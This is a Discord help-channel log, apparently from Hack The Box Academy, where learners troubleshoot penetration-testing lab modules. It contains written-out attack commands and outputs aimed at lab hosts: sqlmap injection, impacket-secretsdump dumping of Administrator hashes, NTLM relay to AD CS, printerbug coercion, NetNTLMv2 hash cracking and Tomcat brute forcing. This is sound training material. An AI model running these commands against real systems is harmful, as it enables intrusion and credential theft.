Hacking wordpress - Login: "Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer."
Not sure what this question even mean and even less why it's here. Anyways, I want to do the whole module and earn my cubes, so I have to pass it. And also I'm kind of that person that wants to clear things and not skip things. I like the feeling of "being done" and not simply skipping and giving up.
But tbh, I'm not learning anything from this, just makes me frustrated. Sorry, but this kind of questions are just silly and doesn't contribute to the overall experience. So please, just help me move on.
I just wanna be safe. And i am really scared, that's why I am looking for some to help me
This isn't that type of server
I dont mean to do search help for illegal things
Somebody here who wants to check the new season machine ? Im ready :)!
have a good day ❤️
Oh okay, im sorry. But do you know which Server I need to go?
I do not
Where can i look for a team ? 🙂 or maybe some people who are often online 🙂
You can try #1318239802931286066
no permissions 😄
got it, thy buddy
Hi everyone,
I'm trying to request a TGT using the gettgtpkinit.py script from the PKINITtools on Hack The Box. I have a valid PFX certificate in Base64 format and I run the command like this:
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ -pfx-base64 <Base64PFXString> dc01.ccache
This indicates that the TGT request succeeded.
However, when I try a similar process on my own lab/environment, it fails and I get errors or no TGT is issued.
"KDC has no support for PADATA type (pre-authentication data)"
Sounds like an issue with the kdc not accepting pre-auth stuff
can we use mobaxterm to SSH into the boxes to answer questions in the module?
That question wants you to search for "quoted stuff" on the Internet and see if you can find something that explains how to execute those calls. At least that's how I interpreted it and was able to answer the question.
Hello Everyone. Im working on https://academy.hackthebox.com/module/136/section/1291 File Upload Attacks, Limited File Uploads. I think Ive figured out how to upload the malicious SVG, but I cant figure out how to view any output. Any help would be great! Im still trying to figure out Burp
on the module, theres a similar thing they do
you are on the right track, just try and take a look at the limited file uploads section again
Hi! Can I ask on DMs for sm1 to give me a little help on the Password Attacks module?
Simple wordlist: capitalize each keyword given.
Simple custom.rule: Also don't forget about adding characters at the end. See the linked hashcat rules page from the section
Yeah, I ended up using CuPP and it's not even working with that and it applies all that modifications
That's why I'm asking for help, I can throw all my process in case u find an issue on it or smth
You don't need to use cupp
Just a simple base list, and a simple custom.rule based on a few basic rules
I know but after SEVERAL days trying to do handmade I wasn't able so tried to use it.
I.e. adding special characters at the end
Or adding full stuff at the end such as a year
Quick question (and please tag me in the response): how can i revisit the content of a finished module in case I have forgotten to take notes/improve my notes of said module?
Go to module -> retake module. Your dashboard (not enterprise) lists all completed modules. You can utilize the search feature at the top as well
Okay, thank you very much!
As an example $! Adds "!" At the end of the affected word. I.e.
Word -> $! -> Word!
Hey, new to pentesting. Having trouble connecting to redis-cli. Any reason my VM cannot connect to it?
Starting Point, Redeemer
Wrong channel: #starting-point
Still exhausted :c
im struggling fr with this ffs
Dm me with your rule list
im using best64.rule
alrighty ill try
It'll likely miss the exact thing needed
The hint button for the question is helpful to think of an additional rule or two to add
hey btw marcielee
doing server side skill assesment, im tryna get a connection to my machine but it doesn't connect, am i on the wrong track or am i doing it incorrectly?
Hello
Don't think I've done that one
Oka, and there is any way to generate all the possible combinations of my .list?
You don't need a fancy base wordlist before mutation
like, if my .list looks like
zaiden
marcie
lee
it generates
zaidenmarcie
marcielee
zaidenlee
and so
alrighty
Just make sure to capitalize the first letter of each word
didnt you finish the path already?
retaking it
taking cbbh soon, so yeah
im doing only skill assessments again
then you should know the answer to your question
honestly, i just forgot
its been a while
got it now though
Thats not how that works, you'd need to add some additional rules to add those in. But again. You don't need anything complex
make writeups for every exercise
Just did!
I'll give it another try, thanks for answering
If someone could DM me. I really could use some help. Im working on https://academy.hackthebox.com/module/136/section/1291 File Upload Attacks, Limited File Uploads. I think Ive figured out how to upload the malicious SVG, but I cant figure out how to view any output. Any help would be great! Im still trying to figure out Burp
Using repeater you should see the response
the only response Im seeing is "File successfully uploaded"
I used dirsearch and found where the files are being uploaded to, and there isnt any useable output
I just recall following the examples and it working as expected
can anyone please help me out: i am stuck on a sqli injection.
when I go to the URL: http://ip/index.php?id=' I get a sql error, so it is injectable. But the description says: Security is not a joke, and filtering is serious business.
So I guessed I needed to do some filtering, and It appears that the server removes spaces. Been trying to exploit this for hours with sqlmap but no luck.
Anyone can help me? Tried commands like: sqlmap --flush-session -u "http://ip/index.php?id=4" -p id --batch --random-agent --level=5 --risk=3 --dbms=mysql --tamper=space2comment,randomcase,between --technique=BEUT --time-sec=8
Hello
Thanks for a push in the right direction, now I figured out what they actually asked for and found the answer 👍
DM
Why I can't message in general I have a I need help
Read the #welcome instructions
Which module and section?
So I need to make a account In that site ?
Yes, this server deals with HackTheBox (and HackTheBox accessories)
@rustic sage we don't do that kind of hacking here.
No it's not hack
Well we don't do anything with Whatsapp
Also you don't have image permissions to send videos/images
Oh okay bro is there a place that I can get help from ?
This isn't a troubleshooting server. And this channel is specifically for help with the htb academy learning modules
Okay bro sorry for bothering you
Just ask WhatsApp support
Hey what would you guys do to find the default credit of prtg if u know the username prtgadmin, instead of just manually guessing the password
Google?
creds app is good too
This error is still happening. Does anyone have any thoughts?
guys, it's normal? i tried three different ways to connect using xfreerdp and i can't. but the machine receive my pings.
"Kerberoasting - from Windows (Module)"
Tack on /timeout:10000.
oh, you are a gentleman... works now
Looking at my notes from this, I didn't have any issues. I'll spin it up real quick and try it out again.
Thanks, I have a feeling I'm doing something stupid.
If you want to DM you can.
could anyone help me out on Web Attacks skill assesment
i found the IDOR but i cant do anything with it that i know of
Look at the previous sections again
who or where do i need to go about having issues with modules not loading?
<@&861185840277487616> ban the account mods?
do i need to ping seriousrulebreakagain?
HAH!
what happened guys
second time a scam server is promoted
dude just tried to scam me
pinged SRB a while ago and someone deleted the msg, i thought it was a mod
apparently not
@visual cedar This account keeps promoting a scam server.
just check deleted msgs log
He's banned
alr
thanks
nooo la poliziaa noo
i thought a mod had deleted his msgs thats why i deleted the previous SRB ping i did
jajajajjaa
You should look at possibly enumerating possible users
i found the 52
i think i have an idea though
But seriously tho, i'm having issues trying to launch a pwn-box
who or where should i turn to?
Try CTRL+SHIFT+R or another browser, if it's truly a server side issue you'd need to reach out to support on the site.
rgr rgr
Have you tried changing the VPN server?
yarp
changing regions may help too
tried that as well
can you give me a hint
sometimes the "methods" you use matters.
Not quite.
please do not reveal details of skill assessments
oh sorry
take it to DM if you feel you need to reveal info. anyone who has done these doesn't need exact answers like that they already know the answer.
i just want a hint
i dont want info
i did this 2 years ago i forget a lot
i understand but you don't need to reveal things from the assessment to ask a question
I sent a DM
Can I dm someone on “credential hunting in network shares"?
Can I ask a question here if I’m stuck on a question?
so long as your question doesn't contain a bunch of spoilers for the module/section
The question doesn’t: The question is “How many total packages are installed on the target system?”
I used apt and we to count them but keep getting the wrong answer. Am I misunderstanding the question?
wc *
Did you take into account that not all lines outputted by apt is an installed package? some lines could be headers
i did not take that into account, but furthermore, i didnt see anything at all on the page that even mentions packages, so im spinning my wheels
well apt has a way to list installed packages
also make sure you're ssh into the target when doing this exercise
i dont want to put the command here, but i used a very appropriate switch/flag to list the installed packages, but 0xW1LD mentioned that it would also include headers in the STDOUT
a way to check if there may be an extra header at the top would be to check with | head
im going through man pages now
so you can see the top 10 lines are
ah ok that makes sense
the warning message that apt gives you is part of stderr, not stdout, so it's not being counted
Attacking Common Services - Easy
Just Repeating the Modules:
The Target SMTP service goes offline after some minutes(confirmed this by scan).. have tried SMTP User enum with other methods as well
RCPT isn't always reliable, try other methods
also changing the timing is useful.
The module is above tier 0 so avoid sharing spoilers
have tried but same issue
the smtp service can be slow to respond, increasing the wait time can be useful
didn't work, tried just now
Needed Help in Password Attack Pass the Certificate
I got
impacket-secretsdump -k -no-pass -dc-ip 10.129.64.94 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
instead of getting NTDS.Dit secrets and don't know why
can u elaborate the issue, it's not clear.
have u export db.cache?
have u exported db.cache?
Thanks that's work.
yes I export the cache
In the initial step instead of getting ./DC01$.pfx file I got the base64
might it be a problem
but somehow i converted it to .pfx
openssl pkcs12 -export -out DC01$.pfx -inkey dc01.pem -in dc01.pem -passout pass:
you shouldn't have to convert anything to .pfx
Then how can i get the certificate
i am sure u have not followed the path completely
the ntlmrelay command should provide it to you
the ntlmrelayx command then the printerbug command
just gotta keep the ntlmrelayx command running
Remember make sure to export KRB5CCNAME=/tmp/dc.ccache outside of python env
after that it should be trivial to save the ccache file and follow from there
the ntlmrelayx command gives me base64 instead of DC01$.pfx
it shouldn't give you base64, the output you get from ntlmrelayx should tell you the file is saved as 'DC01\$.pfx'
I tried outside of python env but it gives me
impacket-secretsdump -k -no-pass -dc-ip 10.129.64.94 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
[*] Cleaning up...
pre-auth invalid
that means your ccache file isn't proper
My ntlmrelayx output
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 13
[*] Base64 certificate of user DC01$:
MIIRtQIBAzCCEW8GCSqGSIb3DQEHAaCCEWAEghF....
again it should be saving to a file, not sure why you're getting base64
if you do ls in the directory you launched ntlmrelayx from do you see a DC01$.pfx?
I think thats might be the problem
when I got that base64 i save it as .pem and somehow convert it to .pfx using openssl
Resolve DC01 to ip work for me
you can use gettgtpkinit.py -pfx-base64 $(cat base64.txt) <domain>/DC01$ <output file> to get the TGT
source: https://github.com/dirkjanm/PKINITtools/blob/master/README.md#gettgtpkinitpy
music45 is right. You need to resolve the domain controller's ip to its hostname.
you mean this
10.129.64.94 DC01.INLANEFREIGHT.LOCAL DC01
to /etc/hosts
let me try
i'm curious what your command was for ntlmrelayx that got you the b64 output 🤔
instead of it saving to a file
I don't think the extra DC01 is necessary at the end. Also the command requires you to have the correct KRB environment variable.
with windows and AD the DC01 is necessary
it's just how kerberos does things
It's different on Windows and Linux?
not entirely sure with linux domain joined machines but for kerberos it looks for both the FQDN and shortname
I see, it worked for me fine without the DC01 at the end, but maybe it was a special case.
thats my command
i didn't use sudo to run ntlmrelayx
^^
permission is denied without sudo in my case
hmm may be your environment then
Just tested it, does not require admin permissions. That is very strange.
I think so
I can’t figure out how to access the admin login on nibbles
Hey for anybody doing CBBH want to have a study partner? I’m pretty far into it and to be honest looking for someone else who isn’t a complete nub, but also struggling by themselves because their brain doesn’t do web very well like mine
follow the module closely
Also looking for any mentors out there that might want to help a brother out
For CBBH that already have it
Probably the wrong channel for this.
Not really it’s specifically for the modules
Or this only for help?
I may be confused on that as I haven’t used this section of the discord so my apologies if so
this channel is really only for help with the modules, not asking for study buddies
Gotcha would CBBH be more appropriate?
and even then study groups tend to not work out too well for this kinda thing due to it being a self-paced course
Yea but it doesn’t hurt to ask if someone else is looking. Would CBBH be a good spot or are these sections specifically for like technical support help?
That's illegal, can't help you, go talk to her about it or if you think it's needed go contact law enforcement
Hi
Yes I know sorry but this is the only Way.... I can pay if I need
No. That is not what this discord server is about.
Even if that were true ,don't ask for it in here, it's against the #rules
What do I need to read here to access general?
Read #welcome and follow instructions
Still redirecting to here
Didn’t follow the instructions then
Clicking and scrolling won’t do the trick. You gotta actually read and do as you’re told
No. You do as you’re told in the instructions. Ain’t nobody here gonna be able to do it for you
Thanks man I will do it now
@fierce sable don't dm without asking first
Has anyone completed the final assessment for LLM Output Attacks? I have what seems like a reasonable payload but haven't been able to get it to work in places where I thought it might work. I could really use some advice! Thanks much!
Hi GUYS, anyone knows a guide on certipy covering all kinds of ESC attacks?
The documentation of the tool
IF Juicy potato / printspoofer binaries dont launch , don't even get syntax etc even though a system is vulnerable , anyone have a good idea of where to go from there? all flags CLID etc are fine, don't even get an error
Still does not work. Same error. on the serverside I get:
025/06/24 06:51:28 server: session#1: tun: conn#1: Close [0/7] (error Failed to handle request: read tcp 172.16.5.129:54834->172.16.5.19:3389: read: connection reset by peer)
Hey i am doing AD enumeration and attack skill assesment II i am stuck in question to get flag.txt of MS01 i got creds but i dont seem to able to connect to it using evilwinrm or xfreerdp when ports are open
Submit the contents of the C:\flag.txt file on MS01.
Awesome thanks
Make sure the user you are trying to log in with is in the right group.
@fierce sable did you do the "pass the certificate" lab? I'm getting the same problem
i did, it smoothly, what's your problem?
I am working on 'Parameter Logic Bugs - PoC and Patching - Validation Logic Disparity'.
Here I followed the flow by sending a basic request through RapidAPI to 'http://localhost:5000/api/exams/availability'
{
"id": 1,
"startDate": "2025-06-24T15:47:14.843Z",
"endDate": "2025-07-24T15:47:14.843Z"
}
Got error:
{
"unavailableSlots": []
}
But in the front-end I see available slots from 2025-06-24 up to 2025-07-24, so why not through RapidAPI?
The function should return a list of unavailable dates but it does not. 'unavailableSlots' is empty.
Then I followed the 'Validation Logic Disparity' vulnerability steps
I set a breakpoint (line 166) right after the line where userId is set, and then send a request to the endpoint.
Then I did right-click on the userId variable and select Add to Watch
Then I send a POST request to /api/exams/book with the same id/date body data we saw in the previous section.
{
"id": 1,
"date": "2025-07-24T15:47:14.843Z"
}
But at this endpoint it requires authentication, So I added the to the request, which we can copy from the storage tab in the Browser Dev Tools under Local Storage.
Then we can click on the token and select Copy Row or copy.
Authorization: Bearer <token>
Only this section I don't understand? I can not delete the 'token' word in RapidAPI but only in 'Dev Tools under Local Storage'
Then, in the RapidAPI request, we add it in the Auth tab with the Bearer option "make sure you delete the token word when you paste the value".
Can someone help me with this and also the patch that is provided did not work from the section 'PoC and Patching - Validation Logic Disparity'.
where to delete the word 'token'?
yo guys im on attacking AD
LLMNR/NBT-NS Poisoning - from Linux
im supposed to use responder to listen and send poisoned answers to services
and capture the ntlmv2 authentication request
however this hash cant be cracked with rockyou list
which, i think it should
also tried other wordlists, tried cracking with hashcat and john too
this is my setup
└─$ john/run/john --format=Netntlmv2 --wordlist=/opt/wordlists/rockyou.txt temphash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:08 DONE (2025-06-24 11:16) 0g/s 1609Kp/s 1609Kc/s 1609KC/s !)(OPPQR..CjDC2x[U
Session completed.
hashcat -m 5600 temphash /opt/wordlists/rockyou.txt
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: BACKUPAGENT::INLANEFREIGHT:a1837c1bd036e5b2:85db804...bbe4db
Time.Started.....: Tue Jun 24 11:36:11 2025 (12 secs)
Time.Estimated...: Tue Jun 24 11:36:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1142.8 kH/s (1.17ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344386/14344386 (100.00%)
Rejected.........: 0/14344386 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: kristenanne -> CjDC2x[U
Hardware.Mon.#1..: Temp: 60c Util: 76%
Started: Tue Jun 24 11:36:10 2025
Stopped: Tue Jun 24 11:36:25 2025
idk what im missing here
Somebody can help me to get back my mess?
Check whether you have new lines in the file
check
when i run -
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator '10.129.234.174/DC01$'@DC01.INLANEFREIGHT.LOCAL
I keep getting this error-
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
doing brute force module, the pin python script it's so mean making the pin not in the low number range... running for 20 mins on pwnbox and only up to 2820, or am i meant to ignore script and use burp but even thats slow on free edition
The part where you define DC01$, instead of the IP, shouldn't it be the domain name? so DOMAIN/DC01$ You are trying to log in with DC01$ account and using an IP as domain name
I'll boot up the lab, one moment, we can go to DM
Aight' 🤝🏻
Anyone done Intro to Whitebox Pentesting? How's the 2nd question of Skill Assessment expecting us to throw an exception in NodeJS correctly? I've been trying to make it throw an error then exit, make it exit without throwing error, make it exit while logging info, none works. Every method just shows patch failed. Why is the question so vague?
I can confirm it works correctly by testing locally with different inputs
Have you saved the dc01$ TGT using export KRB5CCNAME? Have you configured /etc/krb5.conf correctly?
Did you make sure you resolve the domain controller's IP to its hostname?
I get the exact same error, if I define the DC01.inlanefreight.local into hosts file, the error changes to invalid_checksum
Just finished the SQLi module. That skills assessment was super fun.
Can't wait to do SQLmap module and automate some stuff though, my lord
check if ur domain is in ur hosts file
User error
The newest iteration of impacket-ntlmrelayx outputs the certificate in base64, but it can just be converted with base64 -d to pfx file
oof lol
Hey all. I'm working through the "NTLM Relay Attacks" module and am stuck at the Skills Assessment Q2. I've had a read online (https://forum.hackthebox.com/t/ntlm-relay-attacks-skills-assessment-question-2/303433/7) and searched HTB Discord. It appears that I should be trying the ESC attacks and have followed the steps but when attempting to run printerbug.py, I'm getting the following error: "SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)". The printerbug.py command I'm using is: python3 tools/krbrelayx/printerbug.py inlanefreight/plaintext$:'password123!'@172.16.119.70 172.16.119.20 where 172.16.119.70 is the target (backup01) and 172.16.119.20 is the listener (attack box). I'm using the pwnbox. Any pointers as I'm pulling my hair out!
just outta curiosity what is the impacket version? mine is showing 0.12.0 (in pwnbox)
For me it's 0.11.0, I installed apt packages: python3-impacket impacket-examples
So it's not the newest iteration then, I assumed wrong 😄
when I installed with pip there were some errors regarding the ntlmrelayx component, it wanted an argument in the rpc function but there was no flag to set it and it was missing in the ntlmrelayx.py file itself
yeah the apt version may be behind the python repository version
It's working for me at 0.12. Maybe try that.
I'll have to demo a newer version on another machine, I just spent an hour trying to fix the toolset
I plan on taking the exam soon, so I cannot afford taking extra risks 😄
Make sure you have everything set up. Use the pwnbox if there are issues, good luck!
Will do, thanks!
I'll most likely do another blind run on the AEN and make a mock report
Can confirm that with 0.12 it creates a file
My original issue with the pip packet was that it requires sudo rights to run ntlmrelayx as it binds to a lower port, so I installed it with user and root separately, because running as sudo the packet wouldn't be found even if it was in path
I also noticed that python version was missing GetUserSPNs.py, just a heads up if someone is using it
@sleek surge to be clear you're on the Knowledge Check section?
yes I am
don't reveal spoiler information for modules.
sry i did not know
the nmap module tells you that sometimes you need to connect to a port via netcat to get more information
can u help me with that
i tried getting the banner but it did not print out anything
also as noted by the info message at the top -sT is incompatible with -g (--source-port) option
you need to use -sS
ss is resulting in the service being tcpwrapped
yeah meaning that you'll need another method to gain information
nmap isn't a one-stop shop
yes nc
anyone keep getting this error on windows server section of win priv esc
with nc, -p is the source port option
Exploit failed: Errno::EACCES Permission denied - bind(2) for 10.10.15.166:445
Interrupt: use the 'exit' command to quit]
permission denied
you need to run the exploit tool with sudo
as 445 is a reserved port (<1024)
as i said i did try that before i did not result anything ..
let me retry wait
remember source port is the port from your system being used to connect
when connecting to a remote resource the syntax is typically nc ip port
still stuck
thanks
it seems the base64 thing is because you're running an older version of impacket-ntlmrelayx
v0.11.0
the pwnbox uses v0.12.0
i tried the nc 1.1.1.1(ip) 55(port) still nothing
nc ip targetport
you know the target port you want to connect to
you also need to specify the source port as well
with -p
okkkk
ntlmrelayx.py --version
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
I enabled printerbug.py verbose logging to try and get to the bottom of this issue, but the exception is the same. I'm unsure why the error is being generated as the target and listener IPs are correct I think. Has anyone else had the same issue here pls, or should I be looking at another technique? Thanks.
that error is expected, check your ntlmrelayx output
Just continuously says attacking and then times out
for this you simply swap the ip for printer bug and ntlmrelayx
also @grizzled schooner don't share passwords/info/spoilers 😉
Oh sorry, didn't realize it was still in there, my bad!
guys who has solved logrotate in linux priv escalation?
Guys, I am on module/113/section/1090 for the Tomcat Discovery. I am not sure how to figure out the answer of the 2nd question "What role does the admin user have in the configuration example?" Because I cannot seem to access or know how to access the tomcat-users.xml configuration file.
try restarting the ntlmrelayx command @grizzled schooner
On my 2nd restart for ntlmrelayx and the machine(s) in general --> was happening last night as well
module/section numbers mean nothing, it helps to give the module name and section name
keyword here is "example"
as in, what's in the reading
Thanks - Attacking Common Applications > Servlet Containers/Software Development > Tomcat Discovery and Enumeration
I'll let it run a bit longer, and see if it'll work this time around
Ohhhh I thought I was supposed to get the answer out of the running box
try copy/pasting the command directly from the module, to ensure no weird typos
in this case it specifically mentions "example"
I appreciate it, thank you!
be mindful that whenever a question asks for something from the example -> it's from the reading and not from the target
I will pay more attention next time
that's what I did lol
SMBD-Thread-5 (process_request_thread): Received connection from <DC01>, attacking target http://<DC01>
up to SMBD-Thread-12
Guys hello who has done Logrotate from Linux Priv Escalation
including the printerbug command
yeah
sometimes you gotta manually push the file to get it to update i.e. just add a line to the file to force it to update/rotate
I have from the reading
python3 printerbug.py <targetdomain>/user:"password"@DC01 <my ip>
Marcie did it. Can't make logrotten working
logrotten does work; it just takes a little coercion to make the file rotate for the logrotten payload
sudo nc 10.129.2.47 <port> -p 53
Can't grab 0.0.0.0:53 with bind
does this mean that my port 53 is being used? and if yes can i use 1053?
I created payload anyway found logs and transferred logrotten but when I start it, it tells me logrotten is a directory
when start from directory tells me there is no such file
will return to it later
you cannot use a different source port, yes that means port 53 is in use, typically dnsmasq
the only way is to free the 53
@west arrow please don't reveal module content. The best way to figure out what's breaking is to see where the payload is inserted
So after it hit SMBD-Thread-12 it timed out for ntlmrelayx --> re-ran printerbug.py as root and ntlmrelayx with sudo, and I'm getting the same thing
Can anyone give me a nudge?
make sure you use the CA server for the ntlmrelayx command (the -t) option
Yeah im completely lost on this one, even if I copy and paste the code from the module it doesn't work
That's why --> I have that listed as dc01 from the module content
the examples and the exercise don't always line up 1to1
the module content specifies that in the examples the 10.x.x.110 is the CA server and the 10.x.x.109 is the DC01
(then you just need to swap them out for the spawned target servers)
so ntlmrelayx is ca and printerbug to dc01?
yep
if printerbug isn't working well, you can use really anything else
dfscoerce
coercer
petitpotam
you relay the request to the certificate server to your attack system
here's the certipy page regarding the esc8 attack that's going on here https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc8-ntlm-relay-to-ad-cs-web-enrollment
certipy, funnily enough, has a relay option lol
Guys, I am on Attacking Common Services > Tomcat Exploiting
On the question "Perform a login bruteforcing attack against Tomcat manager at http://web01.inlanefreight.local:8180. What is the valid username?"
I have attempted using the metasploit module and set rhost rport and vhost as well but none of the username/password combinations are correct from the default dictionary.
Is something wrong with my ntlmrelayx?
Exception in thread Thread-6:
Traceback (most recent call last):
  File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 38, in run
    ADCSAttack._run(self)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
    certificate_store = self.generate_pfx(key, certificate)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
    obj = getattr(self._module, attr)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
lol
it generated and then popped this but I don't know enough about what this is saying to understand it
sounds like your openssl is bugged out
sudo apt install --fix-broken python3-openssl maybe??
did that and then
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[-] Authenticating against http://10.129.234.172 as / FAILED
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.129.234.174 controlled, but there are no more targets left!
[*] GOT CERTIFICATE! ID 14
Exception in thread Thread-6:
Traceback (most recent call last):
  File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 38, in run
    ADCSAttack._run(self)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
    certificate_store = self.generate_pfx(key, certificate)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
    obj = getattr(self._module, attr)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
https://github.com/fortra/impacket/issues/1716 googled the error and this came up
Q1 / I tried both metasploit module and the python script with the wordlists mentioned in the module (Attacking Common Services >> Attacking Tomcat) but neither worked and I couldn't find any valid cred combos.
Which section is this?
Nvm, it's the Attacking Common Application module not the Common Service
it's the common applications module, not common services
Yeah
but they did write common services module in their ask
so that will lead to confusion
it looks like you're using the example IP and not the spawned IP
@tepid bronze you'll need to regenerate your account token also #bot-commands is the place to do your verification, not here
Thanks
Who is certified hacker here?
hello i'm new to the server but i do not have access to htb off topic channels, any ideas why?
/logrotten -p /home/htb-student/backups/access.log.1
-bash: ./logrotten: Is a directory
can someone tell me why I am getting this output?
because ./logrotten is a directory and not a file
It is the spawned IP target though.
someone help me with the brute forcing module, it should be easy but I am just not getting it
I am sorry it is the Attacking Common "Applications"
the pure brute forcing I wrote my scripts in java and it was painfully slow, so slow that it would not run the 10000 pins from 0000 to 9999 before the machine stopped so I decided to move on. Later now I use the exact hydra command I need to and I even used the 1000 and 10000 dictionaries but I am getting 0 hits for this. I am really frustrated and I do not know what I am doing wrong.
Did you check with the browser that tomcat is running on 8180 on the spawned machine? It's default port is 8080
Yes I set RPORT to 8180
I know but in explanation I am given this command to run logrotten so which file inside logrotten directory I have to run?
Similarly for the dictionary attacks section I tried using hydra as well and it kept telling me that the server uses HTTP Auth and not a form so to use get method and I tried that as well and yet 0 matches,
I'll boot up the lab and have a look
Wait how did it just work on Metasploit? And not on the python script? I had to run it like 5 times for it to work on metasploit?
Maybe the machine wasn't properly spawned yet
Thanks
whichever the exploit is. logrotten was added after i completed CPTS so i'm not sure which one it is
But the python script still doesn't work is that alright? Why wouldn't it? It seems this lab is fragile.
Try changing the -P parameter to /manager
Now why didn't I think of that? That is actually a good idea

linux privilege
I made a payload and all other stuff but still not working
and can't find anything about this logrotten
in your original command you are showing this:
/logrotten -p /home/htb-student/backups/access.log.1
In the beginning you are referencing a directory, change it to ./logrotten
Does the exploit run?
no
I get some challenge bi oo
Is the logrotten file in the machine?
yes
help Password attack : pass the certificate
sudo evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'
Error: Exiting with code 1
./logrotten -p /home/htb-student/backups/access.log.1 this is the original command
I downloaded it on my attack machine and transferred to the target cause you are not allowed to download it on target machine
DM me
hey guys, can anyone help me with the intro to assembly skills assessment, i've been stuck for a week now
is that assembly language?
I'm stuck on question 2 on credential hunting in network shares. Can someone assist?
yeah
hmm whats the problem? I will try to help
ill dm you
sure
you'll need to join the domain as per the previous section (Pass The Ticket) details
this article by the fantastic 0xBen also helped me understand a bit more https://notes.benheater.com/books/active-directory/page/kerberos-authentication-from-kali
Hello I need help for the exercise HTTP Response Splitting.
I have the xss but I dont understand how to trigger the admin on it.
Can someone DM me pls?
I need help on LLM Output Attacks. Been stuck on the final assessment, I'm pretty sure I'm 90% there but am really struggling with the last bit. Does anyone have advice?
You can dm me (just you)
lol. you, and only you 🫵 may DM me
I asked even yesterday, if no one can help me here can you give me some alternatives?
I can't write there because I have to watch a channel first which I already have
then you didn't read the instructions at the end of #welcome, it's a set of 3 instructions the <Done reading> is a discord thing, not instructions by HTB
Doesn't work 🤷
doesn't work isn't descriptive
read this: #welcome message
It's there all the time, look at modules 😂,I'm currently writing in modules 😂
just read the message i linked.
the <look at> isn't an instruction by HTB, it's a thing by discord pointing you to the most recent active channel that you have write permission to
the actual instructions is a list of 3 steps in order to link your account, Calc kindly pointed to the direct message that contains the instructions explicitly
This is the wrong channel for this.
you should ask in #1318239802931286066
I don't have access
I have no access
Which channel used to find team ?
#1318239802931286066, which you can't access because you need to verify your account first -> #welcome message
Oh okay thanks
#modules message Try this.
I decided to run updates first thinking maybe it was outdated... had like 2000 packages to update lol
